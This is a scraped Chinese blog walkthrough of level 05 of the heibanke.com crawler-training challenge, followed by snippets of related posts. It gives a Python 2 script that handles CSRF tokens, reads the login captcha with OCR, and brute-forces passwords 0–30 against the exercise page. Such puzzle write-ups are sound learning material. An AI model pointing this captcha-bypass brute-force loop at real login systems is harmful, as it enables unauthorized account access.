2. 程式人生 > >黑板客 -- 爬蟲闖關 -- 關卡05

黑板客 -- 爬蟲闖關 -- 關卡05

阿新 發佈:2018-10-01
ref time pos download 模塊 pytho awl post dde

簡介


爬蟲闖關鏈接:


1. ?http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/

2.? http://www.heibanke.com/lesson/crawler_ex04/

3.? http://www.heibanke.com


知識點:cookie & session , csrf , Web編程,驗證碼識別模塊


提示:本題相較之於前4題的難度在於驗證碼識別問題,為了方便起見,就用了網絡上現成的pytesser模塊,PIL模塊64位Python安裝時可能會遇到一點小麻煩,盡量使用32位Python。


pytesser模塊安裝及使用參考資料:


1. http://blog.csdn.net/evankaka/article/details/49533493

2. http://blog.csdn.net/tianxiawuzhei/article/details/44922843

3. http://blog.csdn.net/bigzhao_25/article/details/52350781


參考代碼


#!/usr/bin/env python
# encoding: utf-8
 
import requests
import sys
import re
import threading
from pytesser import *  
 
reload(sys)
 
sys.setdefaultencoding("utf-8")
 
csrf = ""
username = "Peter"
password = "112233"
captcha_0 = ""
captcha_1 = ""
attack_password = ""
 
website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/"
website_attack = "http://www.heibanke.com/lesson/crawler_ex04/"
website_imageBase = "http://www.heibanke.com"
 
payload_login = {
    "username":username,
    "password":password,
    "csrfmiddlewaretoken":csrf
}
 
payload_attack = {
    "username":username,
    "password":attack_password,
    "csrfmiddlewaretoken":csrf,
    "captcha_0":captcha_0,
    "captcha_1":captcha_1
}
 
s = requests.Session()
s.get(website_login)
csrf = payload_login["csrfmiddlewaretoken"] = payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
 
def Test_verCode(image_path):
    image = Image.open(image_path)   
    verCode_res =  image_to_string(image) 
    return verCode_res
 
def getVerCode(resp):
    global payload_attack
    word_captcha_1 = re.findall('<img src="(.*?)" alt="captcha" class="captcha" />', resp.content)
    word_captcha_0 = re.findall('<input id="id_captcha_0" name="captcha_0" type="hidden" value="(.*?)" />', resp.content)
    payload_attack["captcha_0"] = word_captcha_0[0]
    Image_URL = website_imageBase+word_captcha_1[0]
    return Image_URL
 
def downloadImage(Image_URL):
    try:
        pic= requests.get(Image_URL, timeout=10)
    except requests.exceptions.ConnectionError:
        print '[-] Image can not download '
    string = '1' + '.png'
    fp = open(string,'wb')
    fp.write(pic.content)
    fp.close()
 
def get_attackResp(verCode_res,attack_password,s):
    global payload_attack
    payload_attack["password"] = attack_password
    payload_attack["captcha_1"] = verCode_res[0:4:1]
    resp_attack = s.post(website_attack,data=payload_attack)
    payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    return resp_attack
 
def main():
    global payload_login
    global payload_attack
    global s
    resp_login = s.post(website_login,data=payload_login)
    payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
    image_URL = getVerCode(resp_login)
    downloadImage(image_URL)
    verCode_res = Test_verCode('1.png')
    for i in range(31):
        resp_attack = get_attackResp(verCode_res,str(i),s)
        while True:
            if resp_attack.content.find(u'驗證碼輸入錯誤'.decode('utf8')) == -1:
                break
            else:
                print "[-]VerCode ERROR: PW:" + payload_attack["password"] + " -- VERCODE:" + verCode_res
                resp_login = s.post(website_login,data=payload_login)
                payload_login["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
                payload_attack["csrfmiddlewaretoken"] = s.cookies["csrftoken"]
                image_URL = getVerCode(resp_login)
                downloadImage(image_URL)
                verCode_res = Test_verCode('1.png')
                resp_attack = get_attackResp(verCode_res,str(i),s)
                continue
        if resp_attack.content.find(u'錯誤'.decode('utf8')) == -1:
            print "[+]FOUND PASSWORD:" + payload_attack["password"]
            print "\nTEXT:\n" + unicode(resp_attack.content).decode('utf8')
            break
if __name__ == '__main__':
    main()

黑板客 -- 爬蟲闖關 -- 關卡05

相關推薦

黑板 -- 爬蟲 -- 關卡05

ref time pos download 模塊 pytho awl post dde 簡介 爬蟲闖關鏈接: 1. ?http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/ 2.? http:

黑板 -- 爬蟲 -- 關卡04

sso title next 登錄界面 每一個 帳號 鏈接 resp 生成 簡介 爬蟲闖關鏈接: 1.?http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex03/ 2. http://www.h

Python3 黑板爬蟲第一

#coding=utf-8 import re import requests from requests.exceptions import RequestException from bs4 import BeautifulSoup def getHtml(url):

Python3 黑板爬蟲第三

黑板客爬蟲闖關第二關成功後的頁面: http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex02/ 需要註冊,註冊後登陸: 來到這個站點: http://www.heibanke.com/lesson/crawle

Python3 黑板爬蟲第二

#coding=utf-8 import requests from requests.exceptions import RequestException from bs4 import BeautifulSoup def getHtml(url,i): data = {"usernam

黑板爬蟲第一、第二

.com col bs4 con 網址 技術分享 pass while str 上來先貼地址,剛入門的可以來van啊: 黑板客爬蟲闖關 0x00 第一關 打開網址,看到如下頁面: 先抱著試試看的心態在網址後面加上數字看看效果: 怕不是個循環,獲取網頁中的數字不斷

Python:黑板爬蟲第一

nbsp .com lesson sso ext imp arch awl style 近日發現了【黑板課爬蟲闖關】這個神奇的網頁,練手爬蟲非常的合適 第一關非常的簡單 get 請求網址,在響應的 html 中用正則獲取需要在網址後面輸入的數字,生成新的 url,繼續請求

Python:黑板爬蟲第三

註冊 之前 ear crawler htm csrf href else 技術分享 第三關開始才算是進入正題了。 輸入網址 http://www.heibanke.com/lesson/crawler_ex02/,直接跳轉到了 http://www.heibanke.com

黑板爬蟲第三

前面兩關算是比較容易,第三關就有些難度了,因為還需要有web方面的知識才能想到方法。第二關結束後,點選下一關,出來以下頁面: 乍一看還以為進錯了,先不管,註冊登入再說。登入後才進入這個頁面: 題目說比上一關多了兩層保護,我們可以看到頂部有個登出按鈕,

Python 爬蟲(第一

在學習爬蟲時,遇到了一個有意思的網站,這個網站設定了幾個關卡,需要經過爬蟲進行闖關,隨著關卡的網後,難度不斷增加,在闖關的過程中需要學習不同的知識,你的爬蟲水平也自然隨之提高。 按照提示,我們把數字放到位址列的後面,再次進行訪問: 發現,還要再用新的數字放在位址列進行訪問,我們可以猜測了,第一關是將頁面

寶來雍拓新零售遊戲系統開發

闖關 新人 一次 系統介紹 就是 團隊 商家 訂單 公司 寶來雍拓客闖關新零售系統開發app,找莊經理:185651879719微/電 寶來雍拓客新零售賣貨引流系統開發、寶來雍拓客三三復制新零售系統開發、寶來雍拓客新零售吸粉工具系統開發、寶來雍拓客新零售消費198闖關系統開

​老男孩教育每日一題-第64天 -sed命令

正則表達式 sed 每日一題 如下文件內容,cat /tmp/passwd root:x:0: 0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x

pythonchallenge 第1題

pri utf ocr div gif all img hal clr 1、K -> M  O ->Q  E -> G Hint:每個人在解決這個問題之前先想兩次 Text:g fmnc wms bgblr rpylqjyrc gr zw fylb. rf

pythonchallenge 第5題

lam pla none ron pro pic spl ner lis 5、查看網頁源碼 Hint:(1)banner.p   (2)聽起來和peak hell很相似   (3)pronounce it 想了很久大概是要用pickel吧…… import pickle

pythonchallenge 第4題

技術 fin int pre 可能 turn utf com src 4、Hint:(1)urllib可能會有幫助。不要嘗試一直循環,停不下來。400次就已經足夠了     (2)www.pythonchallenge.com/pc/def/linkedlist.php?

pythonchallenge 第6題

txt zip comment span imp lec swe rom channel 6、Hint:(1)<!-- <-- zip --> 試著把URL後綴.html改為.zip 發現可以下載 zip文件最後有一個readme.txt Hint:(2)

pythonchallenge 第7題

pytho 問題 馬賽克 真的 spa () col 闖關 ide 7、Hint:給了一副圖片‘oxygen.png‘,中間有一道馬賽克 先試著把馬賽克像素返回為內容 rgba模式(r=red,g=green,b=blue,a=alpha--->透明度) 這道題真的有

pythonchallenge 第8題

需要 com hide span isp 驗證 常用 ood spa 8、Hint:(1)蜜蜂畫了映射,可點擊,彈出需要進行身份驗證,需要用戶名和密碼     (2)un: ‘BZh91AY&SYA\xaf\x82\r\x00\x00\x01\x01\x80\x0

pythonchallenge 第9題

clas opened second pil play edraw pen code 替換 9、Hint:(1)connect the dots     (2)good.jpg     (3)first+second=?       first:……       sec

02_python練習_01Password

please true () eas auth def symbol strong tro  判斷密碼是否:   1. 長度大於10;   2. 包含數字;   3. 包含大寫字母;   4. 包含小寫字母。 1 # Author:Zhang Yide 2 # cod